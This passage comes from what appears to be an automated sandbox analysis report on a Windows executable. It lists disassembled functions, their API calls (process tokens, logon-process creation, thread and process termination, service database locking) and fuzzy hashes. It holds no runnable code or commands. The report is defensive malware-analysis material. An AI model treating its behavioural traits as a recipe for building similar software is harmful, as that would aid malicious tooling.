                                                                                          • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                          Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                          • String ID:
                                                                                          • API String ID: 3275902921-0
                                                                                          • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                          • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                          • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                          • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                          Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                          • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                          • String ID:
                                                                                          • API String ID: 1413079979-0
                                                                                          • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                          • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                          • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                          • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                          Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                          • __calloc_crt.LIBCMT ref: 0041419B
                                                                                          • __getptd.LIBCMT ref: 004141A8
                                                                                          • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                          • __dosmaperr.LIBCMT ref: 00414201
                                                                                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1803633139-0
                                                                                          • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                          • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                          • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                          • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                          Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                          • String ID:
                                                                                          • API String ID: 3275902921-0
                                                                                          • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                          • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                          • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                          • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                          Function 004554C0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32 ref: 004554DF
                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3691411573-0
                                                                                          • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                          • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                                          • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                          • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                                          Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                          • String ID:
                                                                                          • API String ID: 1814673581-0
                                                                                          • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                          • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                          • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                          • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                          Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                          • String ID:
                                                                                          • API String ID: 2833360925-0
                                                                                          • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                          • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                          • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                          • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                          Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                          • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                          • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                          • EndPath.GDI32(?), ref: 0044724E
                                                                                          • StrokePath.GDI32(?), ref: 0044725C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                          • String ID:
                                                                                          • API String ID: 372113273-0
                                                                                          • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                          • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                          • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                          • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                          Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual
                                                                                          • String ID:
                                                                                          • API String ID: 4278518827-0
                                                                                          • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                          • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                          • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                          • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                          Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDevice$Release
                                                                                          • String ID:
                                                                                          • API String ID: 1035833867-0
                                                                                          • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                          • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                          • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                          • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                          Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                          • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                            • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                          • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                          • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3495660284-0
                                                                                          • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                          • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                          • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                          • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                          Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 839392675-0
                                                                                          • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                          • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                          • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                          • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                          Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000004), ref: 00436055
                                                                                          • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                          • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                          • GetLastError.KERNEL32 ref: 00436081
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 1690418490-0
                                                                                          • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                          • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                          • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                          • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                          Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                          • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                          • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                          • CoUninitialize.OLE32 ref: 00475D71
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
